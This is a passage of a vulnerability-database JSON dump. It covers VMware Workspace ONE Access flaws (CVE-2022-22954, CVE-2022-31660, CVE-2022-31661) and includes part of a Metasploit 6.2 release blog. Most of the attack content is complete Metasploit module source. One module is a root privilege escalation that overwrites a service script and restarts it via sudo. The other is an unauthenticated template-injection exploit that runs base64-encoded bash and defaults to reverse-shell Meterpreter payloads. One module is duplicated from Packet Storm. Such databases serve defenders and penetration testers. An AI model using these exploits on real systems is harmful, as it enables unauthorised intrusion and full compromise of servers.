0x741a972aa2e95260279dc658f4b611ca2039a310ebb834dee47342a5809a68090fed0a87497f617c2b04ecf8aa1d6253cda0a513ccb53b4acc91e89b95b198dce98a0908a4edd668ff51f2fa80f4e2c6bc0b5592248a239f9a7b30b9e53a260b92a3fdf4a07fe4ae6538dfc9fa497d02010ee67bcf29b38ec5a81d62da119947a60c5b35e8b08291825024c734b98c249ad352b116618489246aebd0583831cc40e31e1d8f26c99eb57d637a1984db4dc186f8df752138f798fb2025555802bd6aa0cebe944c1b57b9e01d2d9d81f99a8195222ef2f32de8dfbc150286c122abdc78f19246e5ad65d765c23ba762fe95182587bd738d95814a023d31903c2a46\n DEBUG:root:[*] TLV encryption sorted\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_set_session_guid\n DEBUG:root:[*] sending response packet\n 
DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n DEBUG:root:[*] running method core_enumextcmd\n DEBUG:root:[*] sending response packet\n ... etc ...\n \n\nFor full details, see the [Debugging Meterpreter Sessions documentation](<https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html>).\n\n## User-contributable docs\n\nWe have now released user-contributable documentation for Metasploit, available at <https://docs.metasploit.com/>. This new site provides a searchable source of information for multiple topics including:\n\n * [Common Metasploit workflows](<https://docs.metasploit.com/docs/pentesting/>)\n * [Upgrading shells to Meterpreter](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-upgrading-shells-to-meterpreter.html>)\n * [Kubernetes](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-kubernetes.html>)\n * [MySQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-mysql.html>)\n * [PostgreSQL](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-postgresql.html>)\n * [SMB](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-smb.html>)\n * [SSH](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-ssh.html>)\n * [WinRM](<https://docs.metasploit.com/docs/pentesting/metasploit-guide-winrm.html>)\n * [Installation guides](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>)\n * [Module development resources](<https://docs.metasploit.com/docs/development/developing-modules/guides/>)\n * ... 
and more!\n\nContributions are welcome, and the Markdown files can now be found within the Metasploit framework repo, under the [docs folder](<https://github.com/rapid7/metasploit-framework/tree/master/docs>).\n\n## Local exploit suggester improvements\n\nThe `post/multi/recon/local_exploit_suggester` post module can be used to iterate through multiple relevant Metasploit modules and automatically check for local vulnerabilities that may lead to privilege escalation.\n\nNow with Metasploit 6.2, this module has been updated with a number of bug fixes, as well as improved UX that more clearly highlights which modules are viable:\n \n \n msf6 post(multi/recon/local_exploit_suggester) > run session=-1\n ... etc ...\n [*] ::1 - Valid modules for session 3:\n ============================\n # Name Potentially Vulnerable? Check Result\n - ---- ----------------------- ------------\n 1 exploit/linux/local/cve_2021_4034_pwnkit_lpe_pkexec Yes The target is vulnerable.\n 2 exploit/linux/local/cve_2022_0847_dirtypipe Yes The target appears to be vulnerable. Linux kernel version found: 5.14.0\n 3 exploit/linux/local/cve_2022_0995_watch_queue Yes The target appears to be vulnerable.\n 4 exploit/linux/local/desktop_privilege_escalation Yes The target is vulnerable.\n 5 exploit/linux/local/network_manager_vpnc_username_priv_esc Yes The service is running, but could not be validated.\n 6 exploit/linux/local/pkexec Yes The service is running, but could not be validated.\n 7 exploit/linux/local/polkit_dbus_auth_bypass Yes The service is running, but could not be validated. 
Detected polkit framework version 0.105.\n 8 exploit/linux/local/su_login Yes The target appears to be vulnerable.\n 9 exploit/android/local/futex_requeue No The check raised an exception.\n 10 exploit/linux/local/abrt_raceabrt_priv_esc No The target is not exploitable.\n 11 exploit/linux/local/abrt_sosreport_priv_esc No The target is not exploitable.\n 12 exploit/linux/local/af_packet_chocobo_root_priv_esc No The target is not exploitable. Linux kernel 5.14.0-kali4-amd64 #1 is not vulnerable\n 13 exploit/linux/local/af_packet_packet_set_ring_priv_esc No The target is not exploitable.\n 14 exploit/linux/local/apport_abrt_chroot_priv_esc No The target is not exploitable.\n 15 exploit/linux/local/asan_suid_executable_priv_esc No The check raised an exception.\n 16 exploit/linux/local/blueman_set_dhcp_handler_dbus_priv_esc No The target is not exploitable.\n \n\nSetting the option `verbose=true` will now also highlight modules that weren\u2019t considered as part of the module suggestion phase due to session platform/arch/type mismatches. 
This is useful for evaluating modules that may require manually migrating from a shell session to Meterpreter, or from a Python Meterpreter to a native Meterpreter to gain local privilege escalation.\n\n## Upcoming roadmap work\n\nIn addition to the normal module development release cycle, the Metasploit team has now begun work on adding Kerberos authentication support as part of a planned Metasploit 6.3.0 release.\n\n## Get it\n\nExisting Metasploit Framework users can update to the latest release of Metasploit Framework via the `msfupdate` command.\n\nNew users can either download the latest release through our [nightly installers](<https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html>), or if you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest release.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-06-09T16:39:00", "type": "rapid7blog", "title": "Announcing Metasploit 6.2", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 
10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-0847", "CVE-2022-1388", "CVE-2022-21999", "CVE-2022-22954", "CVE-2022-30525"], "modified": "2022-06-09T16:39:00", "id": "RAPID7BLOG:02EDDA927928C11A6D10A4A0D17823AF", "href": "https://blog.rapid7.com/2022/06/09/announcing-metasploit-6-2/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:27:15", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contain two privilege escalation vulnerabilities. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31661", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31661"], "modified": "2022-08-11T16:11:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:22.05", "cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:one_access:21.08.0.0"], "id": "CVE-2022-31661", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31661", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": 
["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:27:15", "description": "VMware Workspace ONE Access, Identity Manager and vRealize Automation contains a privilege escalation vulnerability. A malicious actor with local access can escalate privileges to 'root'.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-05T16:15:00", "type": "cve", "title": "CVE-2022-31660", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-11T16:10:00", "cpe": ["cpe:/a:vmware:identity_manager_connector:3.3.5", "cpe:/a:vmware:identity_manager_connector:3.3.4", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:one_access:21.08.0.1", "cpe:/a:vmware:identity_manager_connector:19.03.0.1", "cpe:/a:vmware:identity_manager_connector:3.3.6", "cpe:/a:vmware:access_connector:22.05", 
"cpe:/a:vmware:access_connector:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:access_connector:21.08.0.1", "cpe:/a:vmware:one_access:21.08.0.0"], "id": "CVE-2022-31660", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-31660", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": ["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:19.03.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:22.05:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.5:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:access_connector:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager_connector:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}, {"lastseen": "2023-02-09T14:09:50", "description": "VMware Workspace ONE Access and Identity Manager contain a remote code execution vulnerability due to server-side template injection. 
A malicious actor with network access can trigger a server-side template injection that may result in remote code execution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-04-11T20:15:00", "type": "cve", "title": "CVE-2022-22954", "cwe": ["CWE-94"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-09-09T16:47:00", "cpe": ["cpe:/a:vmware:cloud_foundation:4.3.1", "cpe:/a:vmware:identity_manager:3.3.5", "cpe:/a:vmware:workspace_one_access:20.10.0.0", "cpe:/a:vmware:workspace_one_access:21.08.0.1", "cpe:/a:vmware:identity_manager:3.3.4", "cpe:/a:vmware:vrealize_automation:7.6", "cpe:/a:vmware:vrealize_suite_lifecycle_manager:8.2", "cpe:/a:vmware:identity_manager:3.3.3", "cpe:/a:vmware:workspace_one_access:20.10.0.1", "cpe:/a:vmware:workspace_one_access:21.08.0.0", "cpe:/a:vmware:identity_manager:3.3.6", "cpe:/a:vmware:vrealize_automation:8.6"], "id": "CVE-2022-22954", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2022-22954", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": 
["cpe:2.3:a:vmware:identity_manager:3.3.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_automation:8.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_suite_lifecycle_manager:8.2:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:20.10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:cloud_foundation:4.3.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:vrealize_automation:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:20.10.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:21.08.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:workspace_one_access:21.08.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.4:*:*:*:*:*:*:*", "cpe:2.3:a:vmware:identity_manager:3.3.5:*:*:*:*:*:*:*"]}], "metasploit": [{"lastseen": "2022-11-03T06:44:20", "description": "VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges to those of the root user by modifying a file and then restarting the vmware-certproxy service which invokes it. 
The service control is permitted via the sudo configuration without a password.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-02T16:13:28", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-31660", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-03T21:45:06", "id": "MSF:EXPLOIT-LINUX-LOCAL-VMWARE_WORKSPACE_ONE_ACCESS_CERTPROXY_LPE-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/vmware_workspace_one_access_certproxy_lpe/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = ExcellentRanking\n\n include Msf::Exploit::EXE\n include Msf::Post::File\n include Msf::Post::Unix\n\n TARGET_FILE = '/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze\n\n def initialize(info = {})\n super(\n update_info(\n info,\n {\n 'Name' => 'VMware Workspace ONE Access CVE-2022-31660',\n 'Description' => %q{\n VMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges\n to those of the root user by modifying a file and then restarting the vmware-certproxy service which\n invokes it. 
The service control is permitted via the sudo configuration without a password.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'Spencer McIntyre'\n ],\n 'Platform' => [ 'linux', 'unix' ],\n 'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'Targets' => [\n [ 'Automatic', {} ],\n ],\n 'DefaultOptions' => {\n 'PrependFork' => true,\n 'MeterpreterTryToFork' => true\n },\n 'Privileged' => true,\n 'DefaultTarget' => 0,\n 'References' => [\n [ 'CVE', '2022-31660' ],\n [ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ]\n ],\n 'DisclosureDate' => '2022-08-02',\n 'Notes' => {\n # We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service\n # is disabled by default though.\n 'Stability' => [CRASH_SERVICE_DOWN],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [ARTIFACTS_ON_DISK]\n }\n }\n )\n )\n end\n\n def certproxy_service\n # this script's location depends on the version, so find it.\n return @certproxy_service if @certproxy_service\n\n @certproxy_service = [\n '/usr/local/horizon/scripts/certproxyService.sh',\n '/opt/vmware/certproxy/bin/certproxyService.sh'\n ].find { |path| file?(path) }\n\n vprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service\n @certproxy_service\n end\n\n def sudo(arguments)\n cmd_exec(\"sudo --non-interactive #{arguments}\")\n end\n\n def check\n unless whoami == 'horizon'\n return CheckCode::Safe('Not running as the horizon user.')\n end\n\n token = Rex::Text.rand_text_alpha(10)\n unless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token)\n return CheckCode::Safe('Cannot invoke the service control script with sudo.')\n end\n\n unless writable?(TARGET_FILE)\n return CheckCode::Safe('Cannot write to the service file.')\n end\n\n CheckCode::Appears\n end\n\n def exploit\n # backup the original permissions and contents\n print_status('Backing up the original 
file...')\n @backup = {\n stat: stat(TARGET_FILE),\n contents: read_file(TARGET_FILE)\n }\n\n if payload.arch.first == ARCH_CMD\n payload_data = \"#!/bin/bash\\n#{payload.encoded}\"\n else\n payload_data = generate_payload_exe\n end\n upload_and_chmodx(TARGET_FILE, payload_data)\n print_status('Triggering the payload...')\n sudo(\"--background #{certproxy_service} restart\")\n end\n\n def cleanup\n return unless @backup\n\n print_status('Restoring file contents...')\n file_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it\n write_file(TARGET_FILE, @backup[:contents])\n print_status('Restoring file permissions...')\n chmod(TARGET_FILE, @backup[:stat].mode & 0o777)\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/vmware_workspace_one_access_certproxy_lpe.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T06:44:31", "description": "This module exploits CVE-2022-22954, an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the \"horizon\" user.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-02T23:51:46", "type": "metasploit", "title": "VMware Workspace ONE Access CVE-2022-22954", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": 
"COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954"], "modified": "2022-05-03T16:52:50", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_WORKSPACE_ONE_ACCESS_CVE_2022_22954-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_workspace_one_access_cve_2022_22954/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware Workspace ONE Access CVE-2022-22954',\n 'Description' => %q{\n This module exploits CVE-2022-22954, an unauthenticated server-side\n template injection (SSTI) in VMware Workspace ONE Access, to execute\n shell commands as the \"horizon\" user.\n },\n 'Author' => [\n 'mr_me', # Discovery\n 'Udhaya Prakash', # (@sherlocksecure of Poshmark Inc.) 
PoC\n 'wvu' # Exploit and independent analysis\n ],\n 'References' => [\n ['CVE', '2022-22954'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html'],\n ['URL', 'https://srcincite.io/advisories/src-2022-0005/'],\n ['URL', 'https://github.com/sherlocksecurity/VMware-CVE-2022-22954'],\n ['URL', 'https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis']\n # More context: https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433\n ],\n 'DisclosureDate' => '2022-04-06',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => false,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n\n register_advanced_options([\n OptFloat.new('CmdExecTimeout', [true, 'Command execution timeout', 3.5])\n ])\n\n deregister_options('VHOST')\n end\n\n def check\n ret = execute_command(\"echo #{token = rand_text_alphanumeric(8..16)}\")\n\n return CheckCode::Unknown unless ret\n return CheckCode::Safe unless ret.match?(/device (?:id|type): #{token}/)\n\n CheckCode::Vulnerable\n end\n\n def exploit\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n end\n\n def execute_command(cmd, _opts 
= {})\n # Pass cmd to bash without word splitting\n bash_cmd = \"bash -c {eval,$({echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d})}\"\n\n vprint_status(\"Executing command: #{bash_cmd}\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, ssti_uri),\n 'vhost' => rand_text_alphanumeric(8..16),\n 'vars_get' => {\n %w[code error].sample => rand_text_alphanumeric(8..16),\n # https://freemarker.apache.org/docs/api/freemarker/template/utility/Execute.html\n ssti_param => %(${\"freemarker.template.utility.Execute\"?new()(\"#{bash_cmd}\")})\n }\n }, datastore['CmdExecTimeout'])\n\n return unless res\n return '' unless res.code == 400 && res.body.include?('auth.context.invalid')\n\n res.body\n end\n\n def ssti_uri\n %w[\n /catalog-portal/hub-ui\n /catalog-portal/hub-ui/byob\n /catalog-portal/ui\n /catalog-portal/ui/oauth/verify\n ].sample\n end\n\n def ssti_param\n %w[deviceType deviceUdid].sample\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_workspace_one_access_cve_2022_22954.rb", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "packetstorm": [{"lastseen": "2022-08-04T16:04:42", "description": "", "cvss3": {}, "published": "2022-08-04T00:00:00", "type": "packetstorm", "title": "VMware Workspace ONE Access Privilege Escalation", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-31660"], "modified": "2022-08-04T00:00:00", "id": "PACKETSTORM:167973", "href": "https://packetstormsecurity.com/files/167973/VMware-Workspace-ONE-Access-Privilege-Escalation.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Local \nRank = ExcellentRanking \n \ninclude Msf::Exploit::EXE \ninclude Msf::Post::File \ninclude Msf::Post::Unix \n \nTARGET_FILE = 
'/opt/vmware/certproxy/bin/cert-proxy.sh'.freeze \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n{ \n'Name' => 'VMware Workspace ONE Access CVE-2022-31660', \n'Description' => %q{ \nVMware Workspace ONE Access contains a vulnerability whereby the horizon user can escalate their privileges \nto those of the root user by modifying a file and then restarting the vmware-certproxy service which \ninvokes it. The service control is permitted via the sudo configuration without a password. \n}, \n'License' => MSF_LICENSE, \n'Author' => [ \n'Spencer McIntyre' \n], \n'Platform' => [ 'linux', 'unix' ], \n'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ], \n'SessionTypes' => ['shell', 'meterpreter'], \n'Targets' => [ \n[ 'Automatic', {} ], \n], \n'DefaultOptions' => { \n'PrependFork' => true, \n'MeterpreterTryToFork' => true \n}, \n'Privileged' => true, \n'DefaultTarget' => 0, \n'References' => [ \n[ 'CVE', '2022-31660' ], \n[ 'URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0021.html' ] \n], \n'DisclosureDate' => '2022-08-02', \n'Notes' => { \n# We're corrupting the vmware-certproxy service, if restoring the contents fails it won't work. This service \n# is disabled by default though. \n'Stability' => [CRASH_SERVICE_DOWN], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ARTIFACTS_ON_DISK] \n} \n} \n) \n) \nend \n \ndef certproxy_service \n# this script's location depends on the version, so find it. 
\nreturn @certproxy_service if @certproxy_service \n \n@certproxy_service = [ \n'/usr/local/horizon/scripts/certproxyService.sh', \n'/opt/vmware/certproxy/bin/certproxyService.sh' \n].find { |path| file?(path) } \n \nvprint_status(\"Found service control script at: #{@certproxy_service}\") if @certproxy_service \n@certproxy_service \nend \n \ndef sudo(arguments) \ncmd_exec(\"sudo --non-interactive #{arguments}\") \nend \n \ndef check \nunless whoami == 'horizon' \nreturn CheckCode::Safe('Not running as the horizon user.') \nend \n \ntoken = Rex::Text.rand_text_alpha(10) \nunless sudo(\"--list '#{certproxy_service}' && echo #{token}\").include?(token) \nreturn CheckCode::Safe('Cannot invoke the service control script with sudo.') \nend \n \nunless writable?(TARGET_FILE) \nreturn CheckCode::Safe('Cannot write to the service file.') \nend \n \nCheckCode::Appears \nend \n \ndef exploit \n# backup the original permissions and contents \nprint_status('Backing up the original file...') \n@backup = { \nstat: stat(TARGET_FILE), \ncontents: read_file(TARGET_FILE) \n} \n \nif payload.arch.first == ARCH_CMD \npayload_data = \"#!/bin/bash\\n#{payload.encoded}\" \nelse \npayload_data = generate_payload_exe \nend \nupload_and_chmodx(TARGET_FILE, payload_data) \nprint_status('Triggering the payload...') \nsudo(\"--background #{certproxy_service} restart\") \nend \n \ndef cleanup \nreturn unless @backup \n \nprint_status('Restoring file contents...') \nfile_rm(TARGET_FILE) # it's necessary to delete the running file before overwriting it \nwrite_file(TARGET_FILE, @backup[:contents]) \nprint_status('Restoring file permissions...') \nchmod(TARGET_FILE, @backup[:stat].mode & 0o777) \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/167973/vmware_workspace_one_access_certproxy_lpe.rb.txt"}, {"lastseen": "2022-05-03T15:49:31", "description": "", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
